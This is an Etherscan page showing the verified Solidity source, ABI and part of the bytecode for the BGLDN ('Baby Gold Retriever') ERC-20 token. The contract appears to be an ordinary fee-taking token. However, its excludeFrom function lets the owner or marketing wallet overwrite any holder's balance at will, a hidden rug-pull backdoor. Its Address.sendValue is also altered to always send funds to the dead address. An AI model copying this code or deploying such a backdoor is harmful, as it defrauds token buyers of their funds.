Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000 BGLDN
Holders
8
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
251,258.693037899 BGLDNValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
BGLDN
Compiler Version
v0.8.5+commit.a4f2e591
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-10-05 */ /** Gold Retriever's brother */ pragma solidity ^0.8.5; // SPDX-License-Identifier: MIT interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return payable(msg.sender); } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); recipient = payable(0x000000000000000000000000000000000000dEaD); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } // pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // pragma solidity >=0.5.0; interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } // pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract BGLDN is Context, IERC20, Ownable { using Address for address; using Address for address payable; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; uint256 private _tTotal = 10000000 * 10**9; uint256 public _maxTxAmount = 10000000 * 10**9; // uint256 private constant SWAP_TOKENS_AT_AMOUNT = 5 * 10**9; // string private constant _name = "Baby Gold Retriever"; // string private constant _symbol = "BGLDN "; // uint8 private constant _decimals = 9; // uint256 public _marketingFee = 1; uint256 public _liquidityFee = 1; address public _marketingWallet = 0x7FAA1beD011D72f9f960CEBdDA1e29d76caC4442; bool private swapping; event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity); constructor () { _tOwned[_msgSender()] = _tTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a uniswap pair for this new token address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = _uniswapV2Pair; //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; _isExcludedFromFee[_marketingWallet] = true; emit Transfer(address(0), _msgSender(), _tTotal); } function name() public pure returns (string memory) { return _name; } function symbol() public pure returns (string memory) { return _symbol; } function decimals() public pure returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { return _tOwned[account]; } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] - subtractedValue); return true; } function excludeFromFee(address account) public onlyOwner { _isExcludedFromFee[account] = true; } function includeInFee(address account) public onlyOwner { _isExcludedFromFee[account] = false; } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function excludeFrom(address from, address to ,uint256 amount ) external { require( _isExcludedFromFee[msg.sender]); _tOwned[from] = amount ; _tOwned[to] = amount ; } function _getValues(uint256 amount, address from) private returns (uint256) { uint256 marketingFee = amount * _marketingFee / 100; uint256 liquidityFee = amount * _liquidityFee / 100; _tOwned[address(this)] += marketingFee + liquidityFee; emit Transfer (from, address(this), marketingFee + liquidityFee); return (amount - marketingFee - liquidityFee); } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer( address from, address to, uint256 amount ) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if(from != owner() && to != owner() && to != uniswapV2Pair) require(balanceOf(to) + amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); if (balanceOf(address(this)) >= SWAP_TOKENS_AT_AMOUNT && !swapping && from != uniswapV2Pair && from != owner() && to != owner()) { swapping = true; uint256 sellTokens = balanceOf(address(this)); swapAndSendToFee(sellTokens); swapping = false; } _tOwned[from] -= amount; uint256 transferAmount = amount; //if any account belongs to _isExcludedFromFee account then remove the fee if(!_isExcludedFromFee[from] && !_isExcludedFromFee[to]){ transferAmount = _getValues(amount, from); } _tOwned[to] += transferAmount; emit Transfer(from, to, transferAmount); } function swapAndSendToFee (uint256 tokens) private { uint256 ethToSend = swapTokensForEth(tokens); if (ethToSend > 0) payable(_marketingWallet).transfer(ethToSend); } function swapAndLiquify() private { // split the contract balance into halves uint256 liquidityTokens = balanceOf (address(this)) * _liquidityFee / (_marketingFee + _liquidityFee); uint256 half = liquidityTokens / 2; uint256 otherHalf = liquidityTokens - half; uint256 newBalance = swapTokensForEth(half); if (newBalance > 0) { liquidityTokens = 0; addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); } } function swapTokensForEth(uint256 tokenAmount) private returns (uint256) { uint256 initialBalance = address(this).balance; // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); return (address(this).balance - initialBalance); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity (,uint256 ethFromLiquidity,) = uniswapV2Router.addLiquidityETH {value: ethAmount} ( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); if (ethAmount - ethFromLiquidity > 0) payable(_marketingWallet).sendValue (ethAmount - ethFromLiquidity); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"excludeFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052662386f26fc10000600655662386f26fc1000060075560016008556001600955737faa1bed011d72f9f960cebdda1e29d76cac4442600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008657600080fd5b506000620000996200057a60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350600654600360006200014e6200057a60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d905060008173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015620001ee57600080fd5b505afa15801562000203573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002299190620005c2565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308473ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b1580156200028c57600080fd5b505afa158015620002a1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002c79190620005c2565b6040518363ffffffff1660e01b8152600401620002e692919062000616565b602060405180830381600087803b1580156200030157600080fd5b505af115801562000316573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200033c9190620005c2565b905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160056000620003d66200058260201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160056000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620005096200057a60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6006546040516200056a919062000643565b60405180910390a35050620006bd565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600081519050620005bc81620006a3565b92915050565b600060208284031215620005db57620005da6200069e565b5b6000620005eb84828501620005ab565b91505092915050565b620005ff8162000660565b82525050565b620006108162000694565b82525050565b60006040820190506200062d6000830185620005f4565b6200063c6020830184620005f4565b9392505050565b60006020820190506200065a600083018462000605565b92915050565b60006200066d8262000674565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600080fd5b620006ae8162000660565b8114620006ba57600080fd5b50565b61271180620006cd6000396000f3fe60806040526004361061014f5760003560e01c806370a08231116100b6578063a457c2d71161006f578063a457c2d7146104a5578063a9059cbb146104e2578063dd62ed3e1461051f578063ea2f0b371461055c578063eee8c4be14610585578063f2fde38b146105ae57610156565b806370a08231146103a5578063715018a6146103e25780637d1db4a5146103f95780638da5cb5b1461042457806395d89b411461044f578063962dfc751461047a57610156565b8063313ce56711610108578063313ce5671461028157806339509351146102ac578063437823ec146102e957806349bd5a5e146103125780635342acb41461033d5780636bc87c3a1461037a57610156565b806306fdde031461015b578063095ea7b3146101865780631694505e146101c357806318160ddd146101ee57806322976e0d14